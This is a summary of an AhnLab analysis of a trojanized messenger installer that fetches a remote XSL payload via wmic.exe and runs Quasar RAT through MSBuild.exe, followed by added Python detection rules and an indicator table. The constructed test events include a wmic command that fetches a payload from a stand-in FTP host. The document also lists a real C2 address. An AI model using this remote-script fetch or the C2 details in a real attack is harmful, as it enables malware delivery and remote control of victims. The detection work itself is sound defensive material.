Beware of malware disguised as a messenger program (original title: 메신저 프로그램으로 위장한 악성코드 주의)
2020-12-30 • AhnLab
AhnLab described malware disguised as a messenger installer, attributed to a government-backed hacking group active in South Korea and distributed through phishing pages or a supply-chain compromise. The NSIS installer was signed as “Uclick”, and its install script was modified so that the .onInit function launched wmic.exe, abusing the XSL Script Processing technique to fetch a malicious XSL/VBScript payload over FTP from a C2 server. The downloaded script created folders under ProgramData and used XSLT together with the legitimate MSBuild.exe process to inject and run Quasar RAT. The RAT configuration included HOSTS 103.125.216[.]106:8080 and the mutex LOGCVAT_DINOSAUR_STAR, giving the operator keylogging, clipboard theft, remote command execution, and further post-compromise capability.
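The execution chain above (installer spawns wmic.exe with a remote XSL, which then drives MSBuild.exe from a ProgramData path) is visible in process-creation telemetry. The following detection logic is an added example, not code from the AhnLab report; it assumes Sysmon-style fields (image, parent image, command line) and that the XSL Script Processing technique shows up as wmic.exe with a `/format:` argument pointing at an http/ftp URL, which is its usual form. The sample events are constructed, with a documentation-range IP in place of the real C2.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\u\Downloads\messenger_setup.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\u\Downloads\messenger_setup.exe"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Users\u\Downloads\messenger_setup.exe",
     "cmdline": r'wmic os get /format:"ftp://203.0.113.10/update.xsl"'},   # remote XSL (assumed form)
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"MSBuild.exe C:\ProgramData\svc\build.xml"},            # MSBuild driven from wmic
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"wmic process list brief"},                              # benign admin use
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "cmdline": r"MSBuild.exe app.csproj"},                                # benign developer build
]

# /format: followed by an http(s) or ftp URL, optionally quoted.
REMOTE_FORMAT = re.compile(r'/format\s*:\s*"?(?:https?|ftp)://', re.IGNORECASE)
# Script hosts and wmic are unusual parents for MSBuild.exe.
SUSPICIOUS_MSBUILD_PARENTS = {"wmic.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (event index, rule name) for each record matching a rule."""
    hits = []
    for idx, ev in enumerate(events):
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        if image == "wmic.exe" and REMOTE_FORMAT.search(cmd):
            hits.append((idx, "wmic_remote_xsl"))
        if image == "msbuild.exe" and (
            parent in SUSPICIOUS_MSBUILD_PARENTS or re.search(r"\\ProgramData\\", cmd, re.IGNORECASE)
        ):
            hits.append((idx, "msbuild_suspicious_launch"))
    return hits


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {SAMPLE_EVENTS[idx]['cmdline']}")
```

Both rules fire on the constructed chain while the benign wmic and Visual Studio events pass, which is the distinction a detection engineer would tune against before deploying.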
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 103.125.216.106 | 2020-12-30 | 2020-12-30 |